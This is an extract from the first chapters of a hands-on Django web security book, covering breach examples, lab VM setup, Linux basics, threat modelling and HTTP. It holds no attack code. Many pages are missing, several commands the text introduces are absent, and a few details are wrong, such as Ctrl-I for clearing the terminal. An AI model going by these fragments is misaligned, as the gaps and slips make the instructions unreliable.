Secure Web Application Development
Secure Web Application Development
Application
Development
A Hands-On Guide with Python and
Django
—
Matthew Baker
Secure Web
Application
Development
A Hands-On Guide with Python
and Django
Matthew Baker
Secure Web Application Development: A Hands-On Guide with Python
and Django
Matthew Baker
Kaisten, Aargau, Switzerland
Acknowledgments�����������������������������������������������������������������������������xxi
Chapter 1: Introduction������������������������������������������������������������������������1
1.1 About This Book����������������������������������������������������������������������������������������������1
1.2 Who This Book Is For���������������������������������������������������������������������������������������3
1.3 Types of Attack������������������������������������������������������������������������������������������������3
Server-Side Attacks�����������������������������������������������������������������������������������������4
Client-Side Attacks������������������������������������������������������������������������������������������5
1.4 Defense in Depth���������������������������������������������������������������������������������������������6
1.5 Conventions Used in This Book�����������������������������������������������������������������������7
1.6 How This Book Is Organized����������������������������������������������������������������������������7
v
Table of Contents
vi
Table of Contents
vii
Table of Contents
Base64 Encoding�������������������������������������������������������������������������������������������75
Digital Signatures������������������������������������������������������������������������������������������76
Key Exchange������������������������������������������������������������������������������������������������80
4.3 Authentication and Certificates���������������������������������������������������������������������82
Proving Authenticity��������������������������������������������������������������������������������������82
Types of Certificates��������������������������������������������������������������������������������������86
Popular Authentication Authorities����������������������������������������������������������������88
4.4 HTTPS�����������������������������������������������������������������������������������������������������������89
TLS Version 1.2����������������������������������������������������������������������������������������������89
Perfect Forward Secrecy�������������������������������������������������������������������������������91
TLS Version 1.3����������������������������������������������������������������������������������������������92
4.5 Summary������������������������������������������������������������������������������������������������������92
viii
Table of Contents
ix
Table of Contents
PUT Requests����������������������������������������������������������������������������������������������166
PATCH Requests������������������������������������������������������������������������������������������166
DELETE Requests����������������������������������������������������������������������������������������168
REST APIs in Django������������������������������������������������������������������������������������170
6.3 Unit Testing Permissions�����������������������������������������������������������������������������175
6.4 Deserialization Attacks��������������������������������������������������������������������������������179
XML Attacks�������������������������������������������������������������������������������������������������180
Function Calls and Creation�������������������������������������������������������������������������184
Defending Against Deserialization Attacks��������������������������������������������������185
6.5 Summary����������������������������������������������������������������������������������������������������186
x
Table of Contents
xi
Table of Contents
xii
Table of Contents
xiii
Table of Contents
xiv
Table of Contents
Bibliography�������������������������������������������������������������������������������������453
Index�������������������������������������������������������������������������������������������������457
xv
About the Author
Matthew Baker is the Head of Scientific
Software and Data Management at ETH
Zurich, Switzerland’s leading science and
technology university. He leads a team of
engineers developing custom software to
support STEM research projects, as well as
teaches computer science short courses.
Having over 25 years of experience developing
software, he has worked as a developer,
systems administrator, project manager, and consultant in various
sectors from banking and insurance, science and engineering, to military
intelligence.
He can be reached at [email protected].
xvii
About the Technical Reviewer
Sean Wright is an experienced application
security engineer with an origin as a software
developer. He is primarily focused on web-
based application security with a special
interest in TLS and supply chain–related
subjects. He is experienced in providing
technical leadership in relation to application
security, as well as engaging with teams
to improve the security of systems and
applications that they develop and maintain.
He is passionate about being a part of the community and giving back
to the community. Additionally, he enjoys spending his personal time
performing personal security-related research.
xix
Acknowledgments
No book is a one-man show, and this book would not have gone to print
without the support and encouragement of those around me.
I would like to thank my team at ETH Zurich, especially Dr. Uwe
Schmitt who is a wise and rational sounding board. I would like to thank
the team at Apress for their structured and professional execution and for
giving me so much freedom in authoring this book.
Thanks also to my brother, Julian Baker of Flat Earth Industries, for the
graphics he supplied for this book (I especially like the skull earrings on
Alice the Hacker).
Finally, and most importantly, I would like to thank my friends in
Switzerland, my children, and my wife, Sevda, for their encouragement
and for not complaining when I disappear for hours, or days, in front of my
computers.
xxi
CHAPTER 1
Introduction
1.1 About This Book
In 2009, hackers obtained user credentials of over 30 million users
of mobile game publisher RockYou. They exploited a SQL injection
vulnerability to obtain the site’s user table. To make matters worse,
passwords were stored unencrypted, allowing the hackers to obtain their
passwords without further need to crack them.1
In 2010, a developer released a Firefox extension called Firesheep that
enabled eavesdroppers to obtain session IDs of Facebook and other sites
logged in through the same Wi-Fi network. This enabled the eavesdropper
to log in as that user without needing to enter a password.2
In 2017, hackers obtained the records of over 130 million individuals
from credit bureau Equifax. The vulnerability was in a web framework
Equifax was using, Apache Struts. The vulnerability has already been
identified and fixed by Apache, but at the time of the hack, Equifax had not
updated to the patched version.3
1
See https://techcrunch.com/2009/12/14/rockyou-hack-security-
myspace-facebook-passwords/
2
See https://en.wikipedia.org/wiki/Firesheep
3
See https://en.wikipedia.org/wiki/2017_Equifax_data_breach
2
Chapter 1 Introduction
3
Chapter 1 Introduction
There are two broad categories for web application attacks: server side
and client side.
Server-Side Attacks
Server-side attacks target code or services running on the server.
Examples are
4
Chapter 1 Introduction
Client-Side Attacks
Client-side attacks target the user and the user’s browser. These include
5
Chapter 1 Introduction
• Physical
• Technical
• Administrative
6
Chapter 1 Introduction
7
Chapter 1 Introduction
8
Chapter 1 Introduction
9
CHAPTER 2
The Hands-On
Environment
2.1 Introducing the Hands-On Environment
In this chapter, we will set up the tools we will use throughout this book
for the hands-on exercises, including a full, running web application plus
other tools. We will see how to run, edit, restart, and interact with the
web application. The application runs in Linux, and for those who are
unfamiliar with it, there is a quick introduction at the end of the chapter.
You can install the tools on Windows, Mac, or Linux.
To practice web application security techniques, in addition to a web
application and host to run it on, you also need a web server, database,
mail server, and so on. To practice cross-site requests, or explore how
hackers could steal your data, you need an additional host, also running a
web server.
As setting up such services can be fiddly, this book comes with two
virtual machines (VMs) that you can download, build, and edit. One is
configured with a sample web application (a toy coffee shop, which we
have imaginatively called Coffeeshop); the other is also running a web
server and is used for exploring cross-site attacks and defenses. We will use
these VMs for the examples and hands-on exercises throughout this book.
The VMs run either in VirtualBox from Oracle or Docker and are built
with Vagrant, a tool that enables us to script the creation of VMs. We will
also install some other tools such as browsers. All the tools needed are free
for noncommercial, personal use (you should read their license terms if
you want to use them beyond working through this book). The VMs run
Linux. If you are not familiar with Linux, a quick introduction is given in
Section 2.8. For a more detailed coverage, see [30].
The sample code is written in Python using the Django web
framework. We use Python 3.8 and Django 3.2. If you are not familiar with
Django, an excellent tutorial is available at
https://docs.djangoproject.com/en/3.2/intro/tutorial01/
The database the application uses is Postgres version 12.
You will need a Windows, Mac, or Linux machine to install the software
on. Each VM needs disk space of around 8GB. As there are two, you will
need around 16GB free. We will also download VirtualBox or Docker,
Vagrant, Chrome, Firefox, and HTTP Toolkit, so if these are not already
installed, you will need space for those too.
12
Chapter 2 The Hands-On Environment
13
Chapter 2 The Hands-On Environment
Docker containers are usually lighter in weight than VMs and normally
run a single process. We have adapted a solution by John Rofrano1 that
makes a Docker container more VM-like for interoperability with Vagrant.
https://brew.sh
1
See https://github.com/rofrano/vagrant-docker-provider
14
Chapter 2 The Hands-On Environment
• Windows
• Linux
Install VirtualBox
Unless you have a Mac with the M1 processor, the VMs run in VirtualBox
from Oracle, an open-source virtualization tool that lets you run a machine
inside a machine.
To install it, visit www.virtualbox.org/wiki/Downloads and click on
the link for your operating system.
Optionally, also install the VirtualBox Extension Pack, but bear in
mind it is only free for personal use. The link is a little further down the
downloads page. There is only one version: All supported platforms.
2
https://github.com/chipmk/docker-mac-net-connect
15
Chapter 2 The Hands-On Environment
16
Chapter 2 The Hands-On Environment
https://github.com/git-guides/install-git
3
http://atom.io
4
https://code.visualstudio.com
5
www.jetbrains.com/pycharm/
17
Chapter 2 The Hands-On Environment
and follow the instructions for your OS. For Windows, it will take you to
gitforwindows.com
When you have Git installed, start a command prompt (Windows
Command Tool, Mac Terminal, etc.), change to the directory where you
would like to install the code, and type
or
django-coffeeshop/coffeeshop
and
django-coffeeshop/csthirdparty
18
Chapter 2 The Hands-On Environment
Building the Vagrant VM
Vagrant exposes ports that can be mapped to ports on the host system.
Before you can build and provision the VMs, we have to make sure these
will expose and do not clash with other services you are running on your
computer. For the most part, we will access applications on our VMs by
using the VMs’ IP addresses. However, the Coffeeshop VM has one port
19
Chapter 2 The Hands-On Environment
mapped to the host computer (we will see why in Chapter 10). Port 8100
on the VM is mapped to port 8100 on the host. If your computer uses this
port for any other purpose, edit the Vagrantfile file and edit the line
changing the second 8100 to an unused port on your host, for example:
If you don’t know if port 8100 is already used, don’t worry. Proceed to
the next step. If you get an error saying the port is in use, edit the preceding
line and try again.
We can now build the Coffeeshop VM. If you are not on a Mac with an
M1 processor, enter the following at your command prompt:
cd django-coffeeshop/coffeeshop/vagrant
vagrant up
If you are on a Mac with the M1 processor, start the Docker application
from the Launchpad and, once it is running, enter
cd django-coffeeshop/coffeeshop/vagrant
vagrant up --provider docker
20
Chapter 2 The Hands-On Environment
Next, build the CSThirdparty VM. If you do not have a Mac with the M1
processor, use the following commands:
cd ../../csthirdparty/vagrant
vagrant up
cd ../../csthirdparty/vagrant
vagrant up --provider docker
21
Chapter 2 The Hands-On Environment
22
Chapter 2 The Hands-On Environment
23
Chapter 2 The Hands-On Environment
6
https://wsgi.org
24
Chapter 2 The Hands-On Environment
vagrant ssh
vagrant halt
vagrant up
25
Chapter 2 The Hands-On Environment
/etc/apache2/sites-enabled
The Database
The Django applications persist their data in Postgres version 12. Don’t
worry if you are unfamiliar with Postgres. Most of our database-related
exercises will be with standard SQL. Some more detail on Postgres is given
in Chapter 5, where we discuss database configuration.
The Coffeeshop application’s user table, auth_user, contains
three users:
26
Chapter 2 The Hands-On Environment
You can view these variables at the command line within Vagrant, for
example, with
echo $DBOWNERPWD
Make sure you are in the Vagrant VM first with vagrant ssh. This will
also work in a shell script. You can use them in Python with
import os
...
password = os.environ['DBOWNERPWD']
Note that the usernames and passwords differ between the two VMs.
Storing passwords this way is convenient for our exercises but would
be a concern with production passwords. Password security is discussed in
Section 5.9.
27
Chapter 2 The Hands-On Environment
This must be done within the Coffeeshop VM (see Chapter 5 for details
on configuring this). You will be connected as the Postgres superuser
so you can create and delete databases, etc. For connecting to the
CSThirdparty database, replace coffeeshop in the preceding command
with csthirdparty. It must be done from the CSThirdparty VM.
You can obtain an interactive session as the database owner with
psql postgres://$DBOWNER:$DBOWNERPWD@localhost/coffeeshop
or
psql postgres://$DBOWNER:$DBOWNERPWD@localhost/csthirdparty
MailCatcher
Applications need to send email, for example, password reset tokens. For
development purposes, using a real email server is inconvenient: you must
set up a mail server, or at least configure the application to use an existing
one; you must set up a recipient address, wait for the email to arrive, etc.
To avoid this, we use MailCatcher. MailCatcher is an SMTP server.
It runs on port 25, just like other SMTP servers, but instead of actually
sending mail, it makes it available on the local host through a web
interface running on port 1080. The mail doesn’t leave the VM. Any To or
From address can be used—they all arrive in the same place.
28
Chapter 2 The Hands-On Environment
http://10.50.0.2:1080
or
http://10.50.0.3:1080
Changing the Code
As web application code is in the vagrant directory and mounted to
your VM, you can edit the code on your host using your favorite editor or
IDE. You can also edit it within the VM if you choose. See Section 2.4 for
tips on text editors.
29
Chapter 2 The Hands-On Environment
Starting from Scratch
If you find your application has stopped working due to a bad code
change, you can view the differences between your code and the original
Git repository with
git diff
If you wish to discard all your changes and revert to the state in the
repository, you can enter
Take care as this will permanently delete your edits, including deleting
files you have created that are not in the repository. You can undo changes
in just the current directory with
git checkout -- .
30
Chapter 2 The Hands-On Environment
31
Chapter 2 The Hands-On Environment
Command-Line Input
Commands are entered by typing the command name followed by
arguments separated by spaces. If commands or arguments contain
spaces or special characters, they must be escaped with a backslash \, for
example:
Navigating the Filesystem
To list the contents of a directory, use the ls command. For example:
ls /vagrant/coffeeshopsite
ls coffeeshop
ls ../coffeeshop
32
Chapter 2 The Hands-On Environment
You can also use a single dot, which is the current directory. The ls
command by itself lists the current directory.
To list more details about files and directories, use ls -l, for example:
ls -l /vagrant
This lists the permissions, owner, group, size, and last modification
date of each file. By default, hidden files and directories (those beginning
with a dot) are not listed. To list these as well, add -a to the command line,
for example:
ls -a /vagrant
ls -la /vagrant
cd /vagrant/coffeeshop
cd coffeeshop
mkdir test
rm log.txt
rmdir test
33
Chapter 2 The Hands-On Environment
rm -r test
rm -rf test
When you first log in, you will be in your home directory. In our VMs,
this is /home/vagrant. If you log in as root (see later), the home directory
is /root.
Linux Permissions
A Linux system comes with a number of users built in, most of which
cannot be logged in as directly. In a Vagrant VM, the default regular user is
vagrant. Other important users include the superuser account, root; the
user the web server runs as, www-data; and the user the database runs as,
postgres.
A user is a member of one or more groups. By default, the vagrant
user is a member of a group also called vagrant. The www-data user is a
member of a group also called www-data. You can see what groups you are
a member of with the groups command.
Files and directories are owned by a user and a group. They have
separate permissions for the owner, the group, and other users. Those
permissions consist of read, write, and execute flags. You can see them
when you run ls -l, for example:
34
Chapter 2 The Hands-On Environment
ls -l /vagrant
total 20
-rw-r--r-- 1 vagrant vagrant 688 Oct 2 17:05 Vagrantfile
drwxr-xr-x 1 vagrant vagrant 160 Oct 2 17:05 apache2
-rw-r--r-- 1 vagrant vagrant 3435 Oct 12 06:36 bootstrap.sh
drwxr-xr-x 1 vagrant vagrant 288 Oct 3 10:08 csthirdpartysite
drwxr-xr-x 1 vagrant vagrant 96 Oct 2 17:05 mailcatcher
drwxr-xr-x 1 vagrant vagrant 128 Oct 2 17:05 postgres
-rw-r--r-- 1 vagrant vagrant 22 Oct 2 17:05 reboot-provision.sh
The permissions are in the first column. The first character is - for a
regular file and d for a directory. The next three characters are the read,
write, and execute permissions for the owner, the next three for the group,
and the next three for all other users. Execute permission means the
file can be executed. Execute permission on a directory means it can be
cd’d into.
You can change the permissions on a file with the chmod command.
There are two ways. One way is to give one or more permission groups (u
for user (owner), g for group, or o for other), followed by a plus or minus,
followed by one or more permission flags (r, w, or x). For example:
35
Chapter 2 The Hands-On Environment
will give read, write, and execute permission for the owner (binary 111 =
octal 7), read and execute permission for the group (binary 101 = octal 5),
and just read permission for other (binary 100 = octal 4).
You can change the ownership of a file with chown, though only the
superuser root can do this, for example:
36
Chapter 2 The Hands-On Environment
Permissions in Vagrant
For Vagrant folders sync-mounted from the host computer (our /vagrant
and /secrets directories), changing ownership and permissions has no
effect. As Vagrant runs on a variety of operating systems, whose permission
system may not be compatible with Linux, Vagrant assigns a fixed owner,
group, and permissions for these directories and their contents. This is
configured in Vagrant.
runs the psql command (an interactive SQL session) as user postgres.
A convenient way of getting a Bash session as root is
sudo su -
37
Chapter 2 The Hands-On Environment
Environment Variables
Variables can be assigned in Bash. By default, these are only available
in that Bash process, not other commands executed from that process.
However, they can be exported as environment variables that are available
to subprocesses.
For example:
apphome=/vagrant/coffeeshop
export APPHOME=/vagrant/coffeeshop
source script.sh
echo $APPHOME
38
Chapter 2 The Hands-On Environment
will print the contents of the APPHOME variable to the terminal. This is also
true if enclosed in double quotes, for example:
echo "$APPHOME"
echo '$APPHOME'
Text Editors
To edit files within the sync-mounted directories /vagrant and /secrets,
you can use an editor on the host machine: as the files exist both on the
host and VM, you can edit them from either.
To edit files in other directories, you will need to use an editor in the
VM. As the VMs do not have a graphical UI, graphical editors such as
Visual Studio Code or Atom will not work. The three editors installed on
the VMs are Vi, Pico, and Nano.
If you are not experienced with editing files in Linux, Pico and Nano
will feel more intuitive than Vi. To edit a file, type nano (or pico) followed
by the name, for example:
nano newfile.txt
Arrow keys work as expected, Ctrl-S saves the file and Ctrl-X exits.
There are numerous good resources on Nano, for example:
https://linuxize.com/post/how-to-use-nano-text-editor/
If you just want to view a file, not edit it, the cat command will print
the file to standard output, without pagination.
The less command will paginate it, for example:
less Vagrantfile
39
Chapter 2 The Hands-On Environment
jupyter-lab &
[1] 857268
kill %1
The job ID is only available from the Bash session you ran the
command from. The pid can be used from any Bash session.
You can list processes with the ps command. By itself, it will only list
foreground processes running as the current user. Add the x option to list
background processes and add the a option to list processes running by all
users, for example:
ps ax
ls > files.txt
40
Chapter 2 The Hands-On Environment
will list all files in the current directory into a file called files.txt. Using
two greater-than signs
ls >> files.txt
bc < sum.txt
ps ax | less
displays all running processes, but rather than printing to the screen, it
passes it as input to the command less, which also prints to the screen but
paginates it. The less command, as we say before, paginates a file given as
a command-line argument. With no command-line argument, it paginates
standard input.
Clearing the Terminal
You can clear the text on the terminal, restoring the command prompt at
the top of the window, with the command clear. Alternatively, press Ctrl-I.
Exiting Bash
You can exit Bash with the exit command or by typing Ctrl-D.
41
Chapter 2 The Hands-On Environment
2.9 Summary
In this chapter, we installed a full, running web application, Coffeeshop,
which we will use throughout the book to practice web security
techniques. We also installed another web application, CSThirdparty,
which we will use to practice cross-site techniques. These came in the
form of Vagrant VMs running a complete Ubuntu-Linux OS with our web
applications and a mock mail server.
We installed the two most popular cross-platform web browsers,
Firefox and Chrome. Each implements a different set of security measures,
so it is important to have both at our disposal.
We installed a text editor to edit the web application code and HTTP
Toolkit, a tool for examining and editing HTTP requests and responses.
In Chapter 4, we will start getting our hands dirty with the HTTP
protocol. But first, we will look at the more fundamental topic of threat
modelling: understanding what we are trying to protect and from whom.
42
CHAPTER 3
Threat Modelling
In this chapter, we look at the fundamental task of understanding what we
are trying to protect and where threats come from. There are a number of
ways to achieve this. The first method we will look at is asset modelling,
which seeks to enumerate what we want to protect by looking at what is
valuable to our organization.
We will also look at the STRIDE model, a common methodology for
characterizing threats, before diving into a data-flow-oriented approach
to modelling the threat landscape. This will enable us to understand the
attack surface and attack vectors—the entry points and attack processes
hackers may use to gain access to our assets.
44
Chapter 3 Threat Modelling
Assets
Let us list the assets for an example application. Consider a scientific
group at a university who makes a climate change model available on the
Internet. Users can enter environmental parameters, and the site then
makes a climate prediction. For maximum reach, the group decides not to
require users to log in. As the data on their site are public domain, they do
not initially believe the data must be secured.
We may consider the following to be the assets:
• Climate data
• Server availability
• Group’s reputation
Threats
Having identified the assets, we next look at the threats to them. An
example is shown in Table 3-1.
45
Chapter 3 Threat Modelling
From this analysis, it is clear that although the data are public
and perhaps not worth preventing unauthorized users from reading,
there is a threat of the data being written to, with potentially damaging
consequences. For example, the research group may end up using the
modified data for publications and recommendations. Also, due to the
denial-of-service threats, they may wish to review their decision not to
require users to register and log in or take other steps to minimize abuse.
Threat Actors
We can use the assets and threats to identify threat actors: individuals or
organizations interested in that asset and posing that threat.
Threat actors are often divided into categories like the following:
46
Chapter 3 Threat Modelling
47
Chapter 3 Threat Modelling
Based on this analysis, the developers can decide where to focus their
defensive efforts. There is, for example, little impact and likelihood of a
denial-of-service attack on the web server, but there is a high interest, and
medium sophistication, in fraudulent use of their back-end servers. The
developers may therefore choose to rely on upstream network providers to
filter out denial-of-service attacks but may take extra precautions to protect
their back-end servers, for example, by throttling and logging requests.
48
Chapter 3 Threat Modelling
3.3 STRIDE
STRIDE is a method of categorizing risks. It stands for
• Spoofing
• Tampering
• Repudiation
• Information Disclosure
• Denial of Service
• Elevation of Privilege
49
Chapter 3 Threat Modelling
50
Chapter 3 Threat Modelling
51
Chapter 3 Threat Modelling
Trust Boundaries
Threats can become clearer if we add trust boundaries to the diagram.
Trust boundaries mark places where the level of trust changes. There is a
trust boundary between a corporate intranet and the public Internet—only
employees of the company are allowed access to the corporate Internet.
External users are restricted to accessing the application over HTTPS.
Trust boundaries can also exist between hosts. In our example,
different users may have access to the development and production VMs.
There can also be trust boundaries between processes. For example,
our web server runs as user www-data, whereas the database runs as user
postgres. The postgres user cannot edit files owned by www-data and
vice versa.
Figure 3-2 shows the same data-flow model from Figure 3-1 but with
trust boundaries added.
52
Chapter 3 Threat Modelling
The trust boundaries make further threats clear. For example, there is
an escalation of privilege threat from the www-data user to the prod user.
These threats may not exist as actual vulnerabilities, but it is useful
to enumerate them anyway. They form a checklist when testing the
implementation.
3.5 Responding to Threats
Once a list of threats has been identified, our response can be classified
into three categories:
• Accept
• Mitigate
• Avoid
53
Chapter 3 Threat Modelling
3.6 Attack Vectors
Attacks on systems can be multistep and complex. A vulnerability might
not seem serious until viewed as a step in a wider process. We call the
whole process an attack vector.
Consider the example in Figure 3-3. The attacker sends an individual
a spear-phishing email with a link to malicious software. Spear-phishing
emails are designed to convince the recipient to disclose information or
click on a link. Unlike regular phishing emails, they are crafted specifically
for an individual or group of people. In this example, it may appear
to come from the victim’s manager, asking them to install a particular
application.
The victim clicks on the link and downloads the software which,
unbeknownst to them, is a Trojan. A Trojan is malicious software disguised
as something else. It is named after the Greek story by Homer in which
the Spartans besieged the city of Troy by hiding warriors inside a wooden
horse. In our case, we have code disguised as legitimate software but that
actually opens a reverse shell to the attacker’s server (reverse shells are
described in Chapter 7).
Once the reverse shell is established, the attacker uses it to download
the victim’s SSH keys. Among these keys is one that grants the attacker
access to a GitHub repository. The attacker changes the source code in this
repository, adding a backdoor for them to gain administrator access to the
software.
In this example, the intended target was not the initial victim but a
separate software system.
54
Chapter 3 Threat Modelling
55
Chapter 3 Threat Modelling
3.7 Attack Surfaces
NIST, the National Institute of Standards and Technology, defines the
attack surface as
[T]he set of points on the boundary of a system,
a system element, or an environment where an
attacker can try to enter, cause an effect on, or
extract data from that system, system element, or
environment [27].
• URL endpoints
• Files
• Databases
• IP addresses and open ports
• Email accounts
56
Chapter 3 Threat Modelling
Next, list user accounts and groups on the servers that own files or
run services. This includes the OS accounts, database accounts, and
application accounts (e.g., admin accounts).
As an example, our Coffeeshop application contains a Postgres
database running on the same VM as the web application. The database is
run by the postgres Linux user, and the application connects to it as the
coffeeshopwebuser user, which is the owner of the coffeeshop database
and therefore has full access to all tables. Note this is not a good idea in
production systems—see Chapter 5 for better practices. The postgres user
on the VM can connect to the database without providing a password (this
is called peer authentication–again, see Chapter 5).
This means the attack surface for the database includes all URL
endpoints that contain code that accesses the database. Particular
attention should be paid to the set of those endpoints where SQL code is
joined with user input. We will cover this in detail in Chapter 7.
The attack surface also includes any files that contain the database
password, the Postgres port 5432 on the VM, and any host from which
it is reachable. As the postgres user can access the database without a
password, the attack surface includes any user account with access to the
postgres user via Sudo.
For more information on mapping the attack surface, see OWASP’s
guide [22]. For a good book on threat modelling, which expands on the
techniques in this chapter, see [29].
57
Chapter 3 Threat Modelling
3.8 Summary
In this quite theoretical chapter, we looked at how to identify threats. We
started with the asset-based method, which can be started even before
any code is written. We looked at the STRIDE method for characterizing
threats. This technique is useful because it forces us to think in terms of
well-understood threat categories. It helps prevent us from missing threats.
We used data-flow diagrams to identify where threats may exist in
our application. This is a more technical method compared with asset
modelling and requires an understanding of the application architecture
and protocols. It also enables us to identify specific threats that are easy to
miss without looking at concrete implementations.
Hackers rarely achieve their goals by exploiting a single vulnerability.
They construct an attack vector, which is a sequence of steps to achieve
their final goal. We looked at how exploiting seemingly harmless
vulnerabilities can be part of a more damaging hacking campaign.
Finally, we looked at the attack surface, the sum of all entry points into
our application. Understanding the attack surface helps us identify what
weaknesses in our application need strengthening.
In the next chapter, we will look at the most fundamental component
of a web application, the HTTP protocol, as well as encryption techniques
used to make it safer. We will get our hands dirty by experimenting with
the protocol itself plus do some practical encryption using our hands-on
environment.
58
CHAPTER 4
Transport
and Encryption
In this chapter, we look at the most fundamental building block of web
applications: the HTTP protocol. This is the protocol browsers and web
servers use to communicate with each other.
Most web applications use the encrypted version of HTTP, called
HTTPS. So that we can understand this, as well as some topics in future
chapters, we look in some detail at encryption methods before learning
how they are applied in the HTTPS protocol. Encryption techniques
fall into two categories: symmetric and public key. Both are covered in
this chapter. We also look at TLS/SSL certificates, which are an essential
component of HTTPS.
As HTTP and encryption are so fundamental to web application
security, we will use our hands-on environment to explore the techniques
covered in this chapter.
Clients send requests to servers, and servers send back responses. The
main protocol for web requests and responses is the Hypertext Transfer
Protocol (HTTP) [11] or its encrypted version, HTTPS (the “S” stands
for secure). The most used version is 1.1 and is described by an RFC
document, number 2616, which can be found at
www.rfc-editor.org/rfc/rfc2616.txt
Requests and Responses
HTTP is a simple request-response protocol running, by default, on port
80. A client (e.g., a web browser) sends a request to a server. The server
sends back a response. HTTP is stateless: each request and response is self-
contained, and no data is stored in between requests (though we will talk
about persisting data in Chapter 7).
An example HTTP request is
GET / HTTP/1.1
Host: localhost
GET is the method, requesting that the server sends us a resource. GET
and other HTTP methods are described in Section 4.1.
After GET is the URI of the resource being requested, / in this case. This
is the part of the URL after the hostname (and port number, if that is in the
URL). The third parameter is the protocol the resource is being requested
over, HTTP version 1.1 in this case.
The following line specifies the host the resource is being requested
from, localhost. A colon followed by a port number can be appended to
the hostname. If it is not, as in our case, it defaults to 80.
Other headers can optionally follow, one line each with the form
Header-Name: value
60
Chapter 4 Transport and Encryption
For some methods (e.g., POST), a body follows the headers, after a
blank line. A Content-Type header is needed to tell the server what format
the body is in (see the next section).
If the server is listening on the requested port, the client will receive a
response. It has a similar format to the request. An example is
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 07:27:47 GMT
Server: Apache/2.4.41 (Ubuntu)
...
Content-Type: text/html; charset=utf-8
<!DOCTYPE html>
<html lang="en">
...
</html>
61
Chapter 4 Transport and Encryption
HTTP requests are plain text, and so long as the response’s content type is not
binary (e.g., image/jpeg), responses are plain text also. In this exercise, we
will request a resource in the simplest way possible: using Telnet.
You will need your Coffeeshop VMs built. See Chapter 2 if you have not done
this. Once you have your VMs, open a terminal window and change to the
coffeeshop/django/coffeeshop/vagrant directory. Now connect to the
Coffeeshop VM with
vagrant ssh
At the Bash prompt inside the Coffeeshop VM, connect to the web server
running on this host with Telnet:
telnet localhost 80
You can now type a request. The web server will respond in the same session.
Type the following:
GET / HTTP/1.1
Host: localhost
followed by a blank line. Within a few seconds, the server will send the
response, and the Telnet session will end.
A client will typically send more headers after the Host: line. One
header is User-Agent, which describes the browser and operating system.
Servers can use this to identify the browser and customize the response
accordingly. However, it’s important to note that browsers can send what
they like. Hackers can abuse this feature (see Chapter 7).
In the next exercise, we will explore the headers sent by Chrome and
Firefox and the headers sent back by our Coffeeshop application.
62
Chapter 4 Transport and Encryption
Open Chrome and visit our Coffeeshop site by entering the following into the
URL bar:
http://10.50.0.2
Open Chrome’s Developer tools: click on the vertical three dots in the top-
right corner of the browser and select Developer Tools from the pop-up menu,
inside More. See Figure 4-1. When the Developer Tools pane pops up, click on
the Network tab at the top.
63
Chapter 4 Transport and Encryption
If you don’t see any resources in the Name column (see Figure 4-1, where
10.50.0.2 is highlighted), reload the page with Ctrl-R (Cmd-R on Mac). Click on
10.50.0.2, then on the Headers tab.
You should see three sections: General, Response Headers, and Request
Headers. If you scroll through the Request Headers section, you can view the
headers Chrome sent to the server. You can toggle between formatted and raw
display by clicking on View raw/View parsed.
Repeat the exercise with Firefox. The developer tools are called Web Developer
Tools and are under More tools when you click on the three horizontal bars at
the top-right of the browser (see Figure 4-2).
64
Chapter 4 Transport and Encryption
Request Methods
So far we have seen the GET method for requesting resources. The other
methods are HEAD, OPTIONS, POST, PUT, DELETE, CONNECT, PATCH, and
TRACE. Two others, LINK and UNLINK, were previously defined but have
fallen out of use.
Table 4-1 lists the HTTP methods and their purposes. Unless writing
REST APIs, you will most commonly use GET and POST. REST APIs are
discussed in Chapter 6.
65
Chapter 4 Transport and Encryption
The POST, PUT, and PATCH methods take parameters in the request
body. The GET method optionally takes parameters on the URL, after the
resource name and a question mark, for example:
http://coffeeshop.com/viewproduct?id=100&ccy=USD
As URLs cannot contain spaces, when they appear in parameters,
they must be encoded as a plus + or as %20. An actual plus sign must
be encoded as %2B. Every other character, other than uppercase A–Z,
lowercase a–z, digits 0–9, tilde ˜, minus -, full stop ., and underscore _,
must be encoded as a percent % followed by its two-character hexadecimal
code. This is called URL encoding.
The Content-Type header defines the format of the body. A common
format for POST requests is application/x-www-form-urlencoded. The
parameters are URL encoded just as they are for GET, except they are in the
body, not the URL, for example:
user=bob&password=bobPass123
Response Codes
HTTP response codes are numbers between 100 and 599. They are
grouped as follows:
66
Chapter 4 Transport and Encryption
A full list is given in Table 4-2, but the codes you will use most often are
the following:
67
Chapter 4 Transport and Encryption
1xx: informational
100 Continue
101 Switching Protocols
2xx: success
200 OK
201 Created
202 Accepted
203 Non-authoritative Information
204 No Content
205 Reset Content
206 Partial Content
3xx: redirect
300 Multiple Choices
301 Moved Permanently
302 Found
303 See Other
304 Not Modified
305 Use Proxy
307 Temporary Redirect
(continued)
68
Chapter 4 Transport and Encryption
Code Name
69
Chapter 4 Transport and Encryption
Code Name
70
Chapter 4 Transport and Encryption
Public-key encryption uses two keys. The sender uses the recipient’s
public key to encrypt data, and the recipient uses their private key to
decrypt them. The public key can be derived from the private key but not
vice versa (at least not easily).
The benefit of public-key encryption is that the encryption key
need not be kept secret. A disadvantage is that sending the same data to
multiple recipients requires encrypting them with each recipient’s public
key separately. Another disadvantage is that it is slower than symmetric-
key encryption.
Symmetric-Key Algorithms
Symmetric-key algorithms can be block or stream ciphers. Block ciphers
work on a fixed-length block of data. Data are split into chunks of the
required size, and the last chunk is padded if necessary.
Stream ciphers encode data in a continuous stream rather than
in blocks.
The security of an encryption algorithm is a function of the length of its
key. Longer keys are harder to guess, but encryption and decryption take
longer. We measure key lengths in bits.
The most common block cipher symmetric-key algorithms are AES
[9] and DES [5]. Of the two, AES is newer and considered more secure.
It comes in 128-, 192-, and 256-bit versions (commonly abbreviated
as AES-128, AES-192, and AES-256). NIST, the US National Institute of
Standards and Technology, considers any AES key length of 128 bits and
above to be acceptably secure [3].
Other block ciphers include RC5 and RC6. RC4 is a stream cipher.
71
Chapter 4 Transport and Encryption
RSA ENCRYPTION
In this exercise, we will encrypt and decrypt some text using RSA. Begin
by entering the Coffeeshop VM by running the following command within
Coffeeshop’s vagrant directory:
vagrant ssh
Create a text file called plain.txt using Nano, Pico, or Vi, for example:
nano plain.txt
72
Chapter 4 Transport and Encryption
Enter some text and save the file. You can enter any text you like. For our
example, we have entered
Now is the time for all good men to come to the aid of
the party.
